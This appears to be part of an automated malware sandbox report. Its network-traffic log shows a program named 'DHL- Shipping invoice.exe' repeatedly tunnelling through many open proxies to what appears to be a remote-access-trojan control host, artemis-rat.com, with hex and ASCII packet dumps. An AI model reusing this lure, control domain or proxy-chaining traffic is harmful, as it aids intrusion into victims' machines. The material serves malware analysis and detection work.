                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                            Mar 12, 2024 08:38:05.812727928 CET270INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                            Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Debian) Server at artemis-rat.com Port 44


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1174192.168.2.453563162.214.90.49519186484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.008811951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.562479973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.250267982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.359565020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.563366890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1175192.168.2.45360451.79.87.144304646484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.008955002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.562524080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.062794924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953632116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.765840054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.562724113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1176192.168.2.453624172.67.181.20806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.013147116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.100944042 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:37:04 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1177192.168.2.45354479.119.155.6380806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.013379097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1178192.168.2.45361523.134.94.24580806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.013997078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1179192.168.2.4534548.219.97.248806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.014128923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.349459887 CET59INHTTP/1.1 200 Connection Established
                            Proxy-agent: nginx
                            Mar 12, 2024 08:37:04.376432896 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 f0 06 1f e8 58 df ca 95 c5 10 1f db 21 10 89 32 5e 5a 73 bd 75 1f f4 33 5d 68 1e fc 1e a7 81 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                            Data Ascii: eX!2^Zsu3]h*,+0/$#('=<5/Uartemis-rat.com#
                            Mar 12, 2024 08:37:04.922125101 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 f0 06 20 36 f7 7d 4d 2d aa eb f4 ea 3a 0a 6a 91 61 e1 53 5d 6a 77 81 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                            Data Ascii: C?e 6}M-:jaS]jwDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                            Mar 12, 2024 08:37:04.922147036 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                            Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                            Mar 12, 2024 08:37:04.922174931 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                            Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                            Mar 12, 2024 08:37:04.922188044 CET486INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                            Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ
                            Mar 12, 2024 08:37:05.341275930 CET250INData Raw: dd 3e 58 56 24 74 80 b9 27 1b 63 5f ef a9 19 8c 8d 40 28 99 d8 f4 48 25 c8 17 58 4b e3 7f cb 16 07 a2 4a c5 54 e0 a3 5c 64 34 d9 0a 18 65 39 2a 28 a5 5a 2e 54 16 04 9f ec e0 cc 18 dd ee 4a 31 88 ef a7 27 95 4d 11 24 fa 41 7a 55 ad 25 79 fc f7 44
                            Data Ascii: >XV$t'c_@(H%XKJT\d4e9*(Z.TJ1'M$AzU%yD 06<,$[epc:Qk46|3}T. "@?\xsd4Qm'#e;uRm^V,4sX$&t^-G!=0uD}!'YV1Z!}&A{To
                            Mar 12, 2024 08:37:05.352298975 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 30 dc 48 6f 45 72 44 c8 2f 56 67 3a ec d3 20 58 1d dc 49 7e 30 2e cb b8 24 5b 9b f0 d3 f4 d3 65 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 68 fc 95 12 98 64 d7 31 a6 af 7b 99 ed 60 3a d2 7c 9f 06 d5 b9
                            Data Ascii: %! 0HoErD/Vg: XI~0.$[e(hd1{`:|PM
                            Mar 12, 2024 08:37:06.099334955 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 f5 e2 4c 01 87 de 27 16 6c f6 c4 30 8c b6 e0 9d e6 b5 54 06 7a 58 54 2f aa d9 7e d9 71 ce 80 d8 ce ea 06 e5 bd 41 4e ee e4 ed 2a d6 5f 90 15 01 f7 32 46 a1 79 bb 00 4f 67 93 a7 56 eb 6d e0 90 5e 3b 51
                            Data Ascii: L'l0TzXT/~qAN*_2FyOgVm^;Q,'mY"dU_ZuqShL+bD{xTl/NRJ{VyLWl\lGX$[YJ(X-3bgQ
                            Mar 12, 2024 08:37:06.161494970 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 00 58 fe 83 dd 11 f8 74 f9 42 a7 b1 0a 6a 15 47 e4 2d 6a ea e2 5f 42 f9 c1 a3 3f 39 57 5e 64 56 b4 1f df 1f c0 4b 02 6d eb 0f d9 2d 8a 2f 78 27 44 42 b8 a9 c5 2a d6 10 11 a9 a9 28 96 b7 e6 48 cc d1 5e fe 17
                            Data Ascii: XtBjG-j_B?9W^dVKm-/x'DB*(H^`eB8r|&tGyp/R'iLF*I>_BN/mZ=I`N}6vwoTH G#Y3v@{57tJS(35>*
                            Mar 12, 2024 08:37:06.502868891 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 38 97 12 2e c1 82 c0 23 92 cf 66 f6 4f 5a 00 25 14 f1 ff ec e9 14 0e 3f 63 e3 e3 27 8e dc 91 97 1e 9c be 8b a9 b5 0c 33 ee f9 e7 96 61 e5 0d 2f 57 07 fd 41 66 2c 7d fe e3 73 c9 11 ad d9 f3 52 29 ed 56 7a 37
                            Data Ascii: q8.#fOZ%?c'3a/WAf,}sR)Vz7,#!x|4P4~3huw0=*o.j\Gs>rxoJ;<$")+ljU337bi0*MV]:6OzKu?q@X92{3v4sb.>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1180192.168.2.453274184.170.249.6541456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.017827034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1181192.168.2.453488178.253.236.13980806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.018423080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.285487890 CET202INHTTP/1.0 404 Not Found
                            Content-Length: 719
                            Content-Type: text/html
                            Date: Thu, 02 Apr 1970 17:27:48 GMT
                            Expires: Thu, 02 Apr 1970 17:27:48 GMT
                            Server: Mikrotik HttpProxy
                            Proxy-Connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1182192.168.2.45360172.210.252.134461646484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.018657923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1183192.168.2.45361438.54.101.25490006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.018662930 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Mar 12, 2024 08:37:06.175502062 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1184192.168.2.453456202.139.198.1530506484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.020236015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:38:19.259875059 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1185192.168.2.453481103.123.64.23431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.020423889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.800553083 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1186192.168.2.453082162.214.225.223582406484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.051357031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.062647104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1187192.168.2.453473148.72.215.79632126484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.051487923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.878616095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.953687906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:08.104314089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.453427076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:16.843816996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:21.141216040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:29.749809027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:46.952986956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1188192.168.2.45306012.186.205.123806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.052373886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1189192.168.2.45351758.234.116.19781976484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.060153961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1190192.168.2.45362124.249.199.1241456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.060278893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1191192.168.2.45361784.39.112.14431286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:37:04.062040091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
